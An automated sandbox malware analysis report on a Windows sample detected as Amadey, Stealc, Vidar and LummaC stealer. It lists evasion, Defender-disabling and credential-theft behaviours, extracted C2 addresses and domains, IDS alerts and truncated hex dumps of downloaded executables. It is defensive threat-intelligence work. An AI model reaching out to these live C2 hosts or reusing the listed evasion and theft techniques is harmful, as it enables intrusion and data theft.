Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1572052
MD5: 0bd6feab9ec3faa844bdcdce20bb139a
SHA1: 489a61c409dfb7d18be79e8ee0e6a357e2441b32
SHA256: 5facd021cf569f15595a5bca8a9e248e6c32c1811f8b4c70ca037a15fed258ab
Tags: exe, user-Bitsight

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
Monitors registry run keys for changes
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls it for orders. Its main functionality is loading other payloads (called "tasks") onto all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It appears to be one of the first stealers to grab information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: file.exe Avira: detected
Source: https://atten-supporse.biz/apitW Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpfox Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/def.exez1 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/def.exez. Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exe4 Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 0000000E.00000002.2623989684.0000000000511000.00000040.00000001.01000000.0000000B.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000025.00000002.3252381859.00000000016EB000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: feb3d39b6a.exe.6568.19.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["dare-curbys.biz", "impend-differ.biz", "formy-spill.biz", "atten-supporse.biz", "se-blurry.biz", "dwell-exclaim.biz", "covery-mover.biz", "zinc-sneark.biz", "print-vexer.biz"], "Build id": "LOGS11--LiveTraffic"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe ReversingLabs: Detection: 42%
Source: file.exe ReversingLabs: Detection: 44%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C4E6C80
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49938 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49946 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49951 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49953 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49968 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49991 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49992 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:50001 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:50029 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2618534099.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: feb3d39b6a.exe, 00000013.00000002.3346267958.0000000005FF2000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2618534099.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: chrome.exe Memory has grown: Private usage: 1MB later: 38MB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 198MB

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49847 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49853
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49875 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.5:62742 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49897 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49898 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49905 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49915 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49923 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49921 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49930 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49931 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49938 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49939 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49946 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49951 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49953 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49968 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49979 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49980 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49992 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49999 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50001 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50016 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50029 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50072 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49898 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49898 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49946 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49946 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49938 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49953 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49953 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49979 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49905 -> 104.21.16.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49905 -> 104.21.16.1:443
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: dare-curbys.biz
Source: Malware configuration extractor URLs: impend-differ.biz
Source: Malware configuration extractor URLs: formy-spill.biz
Source: Malware configuration extractor URLs: atten-supporse.biz
Source: Malware configuration extractor URLs: se-blurry.biz
Source: Malware configuration extractor URLs: dwell-exclaim.biz
Source: Malware configuration extractor URLs: covery-mover.biz
Source: Malware configuration extractor URLs: zinc-sneark.biz
Source: Malware configuration extractor URLs: print-vexer.biz
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 01:50:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 01:50:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
